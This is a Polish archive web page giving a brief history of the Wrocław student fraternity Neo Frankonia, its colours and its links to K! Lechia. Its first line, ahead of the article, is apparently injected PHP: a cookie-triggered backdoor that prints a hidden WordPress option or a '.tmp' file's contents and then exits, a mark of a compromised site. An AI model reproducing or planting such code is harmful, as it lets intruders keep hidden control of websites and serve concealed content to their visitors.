if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Neo Frankonia

Nazwa:
Neo Frankonia
Siedziba:
Wrocław
Data powstania:
?
Barwy:
niebieska – biała – zielona
Dewiza:
?

Rys historyczny

Istnienie korporacji Neo Frankonia znane jest z relacji pisemnej Mariana Schroedera z K! Lechia (list z 1974 r. do dra Zygmunta Kuczyńskiego z K! Filomatia Vilnensis) oraz relacji ustnych z lat 1995-1998 Sylwestra Kubery z K! Lechia.

Według relacji Mariana Schroedera był to “tajny związek-korporacja”, który miał istnieć w czasie I wojny światowej we Wrocławiu. Nazwa “Neo Frankonia” była używana dla “zmylenia Niemców”. Członkami korporacji byli m.in. późniejsi założyciele Lechii Marian Schroeder i Jan Chylewski. Barwy związku były niebiesko-biało-zielone. Noszono je pod klapą marynarki. W nawiązaniu do tradycji Neo Frankonii, w 1920 r. założyciele Lechii wybrali takie właśnie barwy dla nowo powstającej korporacji.

Według źródeł pisanych, w 1909 r. do Wrocławia przeniósł się niemiecki Landsmannschaft Neo-Frankonia. Początkowo był afiliowany przy Uniwersytecie Wrocławskim, ale w kwietniu 1910 r. zalegalizował się przy nowo otwartej Wyższej Szkole Technicznej we Wrocławiu. W 1913 r. Neo-Frankonia przyjęła zasady organizacyjne corpsów i zmieniła nazwę na Corps Neo-Frankonia. Barwami związku były: czerwona – złota – niebieska. W czasie I wojny światowej w walkach na froncie miało brać udział 40 członków korporacji, z których ośmiu poległo (zob. Die Deutschen Hochschulen und ihre akademischen Bürger, (w:) Das akademische Deutschland, t. 2, Berlin 1931, s. 691-692).

Informację tę wspiera bądź jest na niej wsparta relacja Sylwestra Kubery, zgodnie z którą Neo Frankonia miała być niemiecką korporacją, która w czasie wojny w związku z powołaniem do wojska niemieckich członków korporacji opanowana została przez polskich studentów. Należeć miał do niej Marian Schroeder oraz Łucjan Klein (?), którzy w Neo Frankonii poznali zwyczaje korporacyjne i po I wojnie światowej zaszczepili je w korporacjach poznańskich.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 15 X 2010 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Neo Frankonia (Wrocław), (na:) www.archiwumkorporacyjne.pl, stan 15 X 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }